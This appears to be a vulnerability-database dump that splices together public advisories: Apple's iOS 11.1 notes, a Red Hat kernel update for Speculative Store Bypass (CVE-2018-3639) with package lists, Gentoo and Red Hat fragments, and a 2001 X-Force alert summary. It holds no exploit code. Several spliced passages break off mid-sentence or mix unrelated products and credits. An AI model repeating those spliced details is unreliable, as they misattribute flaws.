http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13785
[ 4 ] CVE-2017-13788
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13788
[ 5 ] CVE-2017-13791
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13791
[ 6 ] CVE-2017-13792
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13792
[ 7 ] CVE-2017-13793
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13793
[ 8 ] CVE-2017-13794
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13794
[ 9 ] CVE-2017-13795
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13795
[ 10 ] CVE-2017-13796
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13796
[ 11 ] CVE-2017-13798
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13798
[ 12 ] CVE-2017-13802
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13802
[ 13 ] CVE-2017-13803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13803
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201712-01
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2017 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
APPLE-SA-2017-10-31-1 iOS 11.1
iOS 11.1 is now available and addresses the following:
CoreText
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to an
unexpected application termination
Description: A denial of service issue was addressed through improved
memory handling.
CVE-2017-13849: Ro of SavSec
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2017-13799: an anonymous researcher
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
access photos from the lock screen
Description: A lock screen issue allowed access to photos via Reply
With Message on a locked device. This issue was addressed with
improved state management.
CVE-2017-13844: Miguel Alvarado of iDeviceHelp INC
Siri
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
use Siri to read notifications of content that is set not to be
displayed at the lock screen
Description: An issue existed with Siri permissions. This was
addressed with improved permission checking.
CVE-2017-13805: Yiğit Can YILMAZ (@yilmazcanyigit)
StreamingZip
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious zip file may be able modify restricted areas of
the file system
Description: A path handling issue was addressed with improved
validation.
CVE-2017-13804: @qwertyoruiopz at KJC Research Intl. S.R.L.
UIKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Characters in a secure text field might be revealed
Description: The characters in a secure text field were revealed
during focus change events. This issue was addressed through improved
state management.
CVE-2017-7113: an anonymous researcher, Duraiamuthan Harikrishnan of
Tech Mahindra, Ricardo Sampayo of Bemo Ltd
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling. This was addressed with improved state management.
CVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU
Leuven
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAln4u7opHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEbQiw//
bEkSQWlXTfpJ/9F2VKbMv+++td8sXozC3ICj9Ho+zhctxNY3MvIqXY8B4MrWB5+e
wgz1X/EQSCMItE2u20uISfApls/8/pBde6kKnca9rPGr7I2BKsuHTfCT3taSkhoj
EWMHEb64Se0hSiWKj99HJ80It9bDGSHz1cofpYDCNSMFBCiGWF2EbMgxUa55T5Vx
BtWZ91y2oU6gTsu4ZSR5NXG+Hi/vFYDnAFSr2/5Dgud4fl0tYk1KZ725g2YvXT7S
E3qV6shwcQtpf5ixm4G2cYalfiAmkYYjA/q2sgLClHDVXaPzahTS9ScMygKo4BsZ
RDboCM0q0ywPl+xnNJFuq2ZpZAfMefuXpcjTSxBDoNXliphzH2YOjk5YtHV47S+x
E8+b/bGDvBiKXJFo+yotJ07er0XtFPxfJKwgaYAi8VAfEXZrIv0uDQfYIZieMIRz
VznZvlaKXpA1Ms3R3rY2ukI9gdyPD0wk7r8zAGD0eTdl8E0bMI89UaSMWqDGf1Jm
9AWKOB7na2ElWNHeEMUAhReOL4jHqu/FLkRuoYVAiYKYUDWJGDlD79Yz8bTqnwtu
AWHqstzzcUVg1HXcwR5ngUDGFFOU2vVkqZRK6uwzCRzd/a7QQ/Lu+86GkfxPUB+p
9rtwIDGcTg0795ylrx8NLY/3BD8xcBMhfcZbpX5TF8s=
=qJV/
-----END PGP SIGNATURE-----
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/ |
|
var-201805-0963
|
Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4. CPU hardware utilizing speculative execution may be vulnerable to cache timing side-channel analysis. Two vulnerabilities are identified, known as "Variant 3a" and "Variant 4". CPUhardware is firmware that runs in the central processor for managing and controlling the CPU. Multiple CPUHardware information disclosure vulnerabilities. The vulnerability is caused by a race condition in the CPU cache processing. Local attackers can exploit vulnerabilities to obtain sensitive information through side channel analysis. AMD, ARM, and Intel CPUs are all CPU (central processing unit) products from different manufacturers. AMD, ARM, and Intel CPUs have security vulnerabilities. Relevant releases/architectures:
RHV-M 4.2 - noarch
3. Description:
The org.ovirt.engine-root is a core component of oVirt. 7) - x86_64
3. Description:
Kernel-based Virtual Machine (KVM) is a full virtualization solution for
Linux on a variety of architectures. The qemu-kvm packages provide the
user-space component for running virtual machines that use KVM. Once
all virtual machines have shut down, start them again for this update to
take effect. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2018:1965-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2018:1965
Issue date: 2018-06-26
CVE Names: CVE-2017-11600 CVE-2018-3639
=====================================================================
1. Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - noarch, ppc64le, s390x
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - noarch, ppc64le
3. Description:
The kernel packages contain the Linux kernel, the core of any Linux
operating system.
Security Fix(es):
* An industry-wide issue was found in the way many modern microprocessor
designs have implemented speculative execution of Load & Store instructions
(a commonly used performance optimization). It relies on the presence of a
precisely-defined instruction sequence in the privileged code as well as
the fact that memory read from address to which a recent memory write has
occurred may see an older value and subsequently cause an update into the
microprocessor's data cache even for speculatively executed instructions
that never actually commit (retire). As a result, an unprivileged attacker
could use this flaw to read privileged memory by conducting targeted cache
side-channel attacks. (CVE-2018-3639, PowerPC, x86 AMD)
* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message
(CVE-2017-11600)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
Red Hat would like to thank Ken Johnson (Microsoft Security Response
Center) and Jann Horn (Google Project Zero) for reporting CVE-2018-3639.
Bug Fix(es):
These updated kernel packages include also numerous bug fixes. Space
precludes documenting all of the bug fixes in this advisory. See the
descriptions in the related Knowledge Article:
https://access.redhat.com/articles/3485871
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
5. Bugs fixed (https://bugzilla.redhat.com/):
1474928 - CVE-2017-11600 kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message
1566890 - CVE-2018-3639 hw: cpu: speculative store bypass
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
kernel-3.10.0-862.6.3.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-862.6.3.el7.noarch.rpm
kernel-doc-3.10.0-862.6.3.el7.noarch.rpm
x86_64:
kernel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7.x86_64.rpm
kernel-devel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-headers-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-libs-3.10.0-862.6.3.el7.x86_64.rpm
perf-3.10.0-862.6.3.el7.x86_64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
kernel-debug-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-862.6.3.el7.x86_64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
kernel-3.10.0-862.6.3.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-862.6.3.el7.noarch.rpm
kernel-doc-3.10.0-862.6.3.el7.noarch.rpm
x86_64:
kernel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7.x86_64.rpm
kernel-devel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-headers-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-libs-3.10.0-862.6.3.el7.x86_64.rpm
perf-3.10.0-862.6.3.el7.x86_64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
kernel-debug-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-862.6.3.el7.x86_64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
kernel-3.10.0-862.6.3.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-862.6.3.el7.noarch.rpm
kernel-doc-3.10.0-862.6.3.el7.noarch.rpm
ppc64:
kernel-3.10.0-862.6.3.el7.ppc64.rpm
kernel-bootwrapper-3.10.0-862.6.3.el7.ppc64.rpm
kernel-debug-3.10.0-862.6.3.el7.ppc64.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.ppc64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-862.6.3.el7.ppc64.rpm
kernel-devel-3.10.0-862.6.3.el7.ppc64.rpm
kernel-headers-3.10.0-862.6.3.el7.ppc64.rpm
kernel-tools-3.10.0-862.6.3.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
kernel-tools-libs-3.10.0-862.6.3.el7.ppc64.rpm
perf-3.10.0-862.6.3.el7.ppc64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
python-perf-3.10.0-862.6.3.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
ppc64le:
kernel-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-bootwrapper-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debug-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-devel-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-headers-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-libs-3.10.0-862.6.3.el7.ppc64le.rpm
perf-3.10.0-862.6.3.el7.ppc64le.rpm
perf-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
python-perf-3.10.0-862.6.3.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
s390x:
kernel-3.10.0-862.6.3.el7.s390x.rpm
kernel-debug-3.10.0-862.6.3.el7.s390x.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.s390x.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
kernel-debuginfo-common-s390x-3.10.0-862.6.3.el7.s390x.rpm
kernel-devel-3.10.0-862.6.3.el7.s390x.rpm
kernel-headers-3.10.0-862.6.3.el7.s390x.rpm
kernel-kdump-3.10.0-862.6.3.el7.s390x.rpm
kernel-kdump-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
kernel-kdump-devel-3.10.0-862.6.3.el7.s390x.rpm
perf-3.10.0-862.6.3.el7.s390x.rpm
perf-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
python-perf-3.10.0-862.6.3.el7.s390x.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
x86_64:
kernel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7.x86_64.rpm
kernel-devel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-headers-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-libs-3.10.0-862.6.3.el7.x86_64.rpm
perf-3.10.0-862.6.3.el7.x86_64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7):
noarch:
kernel-abi-whitelists-3.10.0-862.6.3.el7.noarch.rpm
kernel-doc-3.10.0-862.6.3.el7.noarch.rpm
ppc64le:
kernel-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-bootwrapper-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debug-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-devel-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-headers-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-libs-3.10.0-862.6.3.el7.ppc64le.rpm
perf-3.10.0-862.6.3.el7.ppc64le.rpm
perf-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
python-perf-3.10.0-862.6.3.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
s390x:
kernel-3.10.0-862.6.3.el7.s390x.rpm
kernel-debug-3.10.0-862.6.3.el7.s390x.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.s390x.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
kernel-debuginfo-common-s390x-3.10.0-862.6.3.el7.s390x.rpm
kernel-devel-3.10.0-862.6.3.el7.s390x.rpm
kernel-headers-3.10.0-862.6.3.el7.s390x.rpm
kernel-kdump-3.10.0-862.6.3.el7.s390x.rpm
kernel-kdump-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
kernel-kdump-devel-3.10.0-862.6.3.el7.s390x.rpm
perf-3.10.0-862.6.3.el7.s390x.rpm
perf-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
python-perf-3.10.0-862.6.3.el7.s390x.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.s390x.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
kernel-debug-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-862.6.3.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
kernel-tools-libs-devel-3.10.0-862.6.3.el7.ppc64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.ppc64.rpm
ppc64le:
kernel-debug-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-libs-devel-3.10.0-862.6.3.el7.ppc64le.rpm
perf-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
x86_64:
kernel-debug-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-862.6.3.el7.x86_64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7):
noarch:
kernel-doc-3.10.0-862.6.3.el7.noarch.rpm
ppc64le:
kernel-debug-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
kernel-tools-libs-devel-3.10.0-862.6.3.el7.ppc64le.rpm
perf-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
kernel-3.10.0-862.6.3.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-862.6.3.el7.noarch.rpm
kernel-doc-3.10.0-862.6.3.el7.noarch.rpm
x86_64:
kernel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debug-devel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7.x86_64.rpm
kernel-devel-3.10.0-862.6.3.el7.x86_64.rpm
kernel-headers-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-libs-3.10.0-862.6.3.el7.x86_64.rpm
perf-3.10.0-862.6.3.el7.x86_64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
kernel-debug-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-862.6.3.el7.x86_64.rpm
perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-862.6.3.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2017-11600
https://access.redhat.com/security/cve/CVE-2018-3639
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/articles/3485871
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBWzJvQtzjgjWX9erEAQhA1BAAnHot2ERbRC9tVbWzn8egMTLwNGaPfu8b
RhzRg0qgwySJM7JXfEC2fKJYoCaL71ykhGUC98wNc5SJVqkfzMt66pyxrMrK8Ff2
+LJW3BFAbFfzzt/NMRwXM+s2TSNj6BhqWpohgmB83jz3uPzH51QBp2SbumMDwdrj
VN9/rZlA/2rofE/7Lyz2B/Rks5oEvRbW4pf4hDpARDLqD8iU4UhW8QGb4HZfH//X
lvVTnKaMvCN1Jecc0fyp6lE4no2FBMPBlIQvnHcHw4gtjBajN4Ics/nMEXs7Zp2/
+sCtyWuH06G6hiawMHmCaw6QPqIvhJ2zcgzZl+18ITDk3OOlIPhpFJHQ1hjKZR3v
5PqvGyVXuKqzwtRIdTvDNIrI42R31xUiLXSk24scMO8p5IiCrONn2Med4LsOH6k8
9hMyYG+oYo3SKjes8N9Q3Gzf98MR/Kkx/5nRRmLpQEHehhNIgBebhscWdL535Ufk
NJ1a4SHRxCoj3WSpx6XDZ+ZjHHWJVYZ8TnvHY2qrD1r1BCZNXkeBYZ4Fthelu5BS
iGLax+RbZbS0n83AmEV7rq85o1i95fJPYTuZ1xzcx8DxZcgwoc6X8h9doz2Rz9Mq
08nScZYH4g6ruhcvWFYnsxx/hYpWvnnaUlmDGKhoUpd5+hCPP3hTx+GvFKi/IjiD
rcTDRBuyPRI=
=PPUN
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6.6) - noarch, x86_64
3. (CVE-2018-3639)
Note: This issue is present in hardware and cannot be fully fixed via
software update. To be fully functional, up-to-date CPU
microcode applied on the system might be required.
In this update, mitigation for PowerPC architecture is provided. Description:
The libvirt library contains a C API for managing and interacting with the
virtualization capabilities of Linux and other operating systems. In
addition, libvirt provides tools for remote management of virtualized
systems. 6) - i386, noarch, x86_64
3. Description:
The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime
Environment and the OpenJDK 7 Java Software Development Kit. (CVE-2018-3639)
Note: This is the OpenJDK side of the CVE-2018-3639 mitigation.
Bug Fix(es):
* If the cifs_reopen_file() function failed to find a file, the pointer to
the cifsFileInfo structure was not reinitialized by being set to "NULL".
Subsequently, the find_writable_file() function used an invalid pointer to
cifsFileInfo. Consequently, the operating system terminated unexpectedly. As a result, the operating system
no longer crashes due to this bug. (BZ#1577086)
4 |
|
var-200102-0104
|
"Multiple Users" Control Panel in Mac OS 9 allows Normal users to gain Owner privileges by removing the Users & Groups Data File, which effectively removes the Owner password and allows the Normal user to log in as the Owner account without a password. The Oracle LDAP Daemon (oidldapd version 2.1.1.1), which ships with Oracle version 8i for Linux version 8.1.7, does not check write permissions properly. This can allow a local user to delete or write to any file on the system. There is a buffer overflow in the IBM AIX setclock command that may allow local attackers to gain root privileges. Apple Mac OS is prone to a local security vulnerability. -----BEGIN PGP SIGNED MESSAGE-----
Internet Security Systems Security Alert Summary
January 1, 2001
Volume 6 Number 2
The following computer security issues have been publicly reported and
documented in the X-Force Vulnerability and Threat Database
(http://xforce.iss.net).
This document is available at
http://xforce.iss.net/alerts/vol-06_num-02.php. To receive these Alert
Summaries:
- - Subscribe to the Alert mailing list from
http://xforce.iss.net/maillists/index.php
- - Or send an email to majordomo@iss.net, and within the body of the
message type:
- - 'subscribe alert' (without the quotes).
_____
Contents
115 Reported Vulnerabilities
Risk Factor Key
_____
Date Reported: 12/31/00
Vulnerability: exmh-error-symlink
Platforms Affected: exmh 2.2 and earlier
Risk Factor: High
Attack Type: Host Based
Brief Description: exmh error message symlink
X-Force URL: http://xforce.iss.net/static/5829.php
_____
Date Reported: 12/30/00
Vulnerability: informix-webdriver-symlink
Platforms Affected: Informix Webdriver
Risk Factor: High
Attack Type: Host Based
Brief Description: Informix Webdriver symbolic link
X-Force URL: http://xforce.iss.net/static/5827.php
_____
Date Reported: 12/30/00
Vulnerability: informix-webdriver-admin-access
Platforms Affected: Informix Webdriver
Risk Factor: High
Attack Type: Network Based
Brief Description: Informix Webdriver remote Admin access
X-Force URL: http://xforce.iss.net/static/5833.php
_____
Date Reported: 12/29/00
Vulnerability: zonealarm-mutex-dos
Platforms Affected: ZoneAlarm Pro
Risk Factor: Medium
Attack Type: Host Based
Brief Description: ZoneAlarm and ZoneAlarm Pro Mutex creation denial
of service
X-Force URL: http://xforce.iss.net/static/5821.php
_____
Date Reported: 12/29/00
Vulnerability: zonealarm-batfile-dos
Platforms Affected: ZoneAlarm Pro
Risk Factor: Medium
Attack Type: Host Based
Brief Description: ZoneAlarm and ZoneAlarm Pro can be taken down with
a batch file
X-Force URL: http://xforce.iss.net/static/5822.php
_____
Date Reported: 12/29/00
Vulnerability: shockwave-flash-swf-bo
